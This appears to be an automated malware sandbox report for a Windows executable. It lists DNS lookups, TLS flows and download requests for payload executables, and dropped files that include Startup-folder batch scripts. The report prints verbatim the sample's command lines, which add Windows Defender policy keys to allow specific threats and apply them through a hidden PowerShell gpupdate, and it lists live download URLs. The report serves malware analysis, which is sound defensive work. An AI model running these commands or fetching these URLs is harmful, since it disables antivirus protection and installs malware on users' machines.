Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 12, 2024, 9:13 a.m. | Aug. 12, 2024, 10:02 a.m. |
-
-
-
-
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2912-
forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
2996 -
forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
2148 -
forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
1284 -
forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
1440 -
forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2780-
-
-
gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
2468
-
-
-
-
-
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
yip.su | 172.67.169.89 | |
cacerts.digicert.com |
CNAME
fp2e7a.wpc.phicdn.net
|
152.195.38.76 |
pastebin.com | 104.20.4.235 | |
raw.githubusercontent.com | 185.199.111.133 | |
58yongzhe.com | 178.22.31.113 | |
github.com | 20.200.245.247 | |
cdn.discordapp.com | 162.159.134.233 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 172.67.169.89:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 162.159.133.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49165 104.20.3.235:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.103:49167 20.200.245.247:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA | CN=github.com | e7:03:5b:cc:1c:18:77:1f:79:2f:90:86:6b:6c:1d:f8:df:aa:bd:c0 |
TLS 1.2 192.168.56.103:49171 185.199.111.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://194.58.114.223/d/385121 | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://58yongzhe.com/parts/setup1.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://pastebin.com/raw/xYhKBupz | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/evan9908/Setup/raw/main/222fastsetup.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://yip.su/RNWPd.exe |
request | GET http://194.58.114.223/d/385121 |
request | GET http://58yongzhe.com/parts/setup1.exe |
request | GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt |
request | GET https://pastebin.com/raw/xYhKBupz |
request | GET https://github.com/evan9908/Setup/raw/main/222fastsetup.exe |
request | GET https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& |
request | GET https://yip.su/RNWPd.exe |
file | C:\Users\test22\AppData\Local\Temp\7zS5F7B.tmp\Install.exe |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CtR52JA5gkRmkrw4WjnncBWq.bat |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPR52zbYKzlnTUwhlGwv3UGk.bat |
file | C:\Users\test22\AppData\Local\Z8SHBnj525WmwLcm3I5TEMZZ.exe |
file | C:\Users\test22\AppData\Local\VYs7aogGIrLCpxX1KYEaoAL7.exe |
file | C:\Users\test22\Pictures\uzJnASoMj3qwVnDCe7c6jzSi.exe |
file | C:\Users\test22\AppData\Local\Temp\7zS5C4F.tmp\Install.exe |
file | C:\Users\test22\Pictures\kkvKu24VMv4qXlO8rQfFfuQd.exe |
file | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell start-process -WindowStyle Hidden gpupdate.exe /force |
cmdline | forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | cmd /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" |
cmdline | /C powershell start-process -WindowStyle Hidden gpupdate.exe /force |
file | C:\Users\test22\AppData\Local\VYs7aogGIrLCpxX1KYEaoAL7.exe |
file | C:\Users\test22\AppData\Local\Z8SHBnj525WmwLcm3I5TEMZZ.exe |
wmi | <INVALID POINTER> |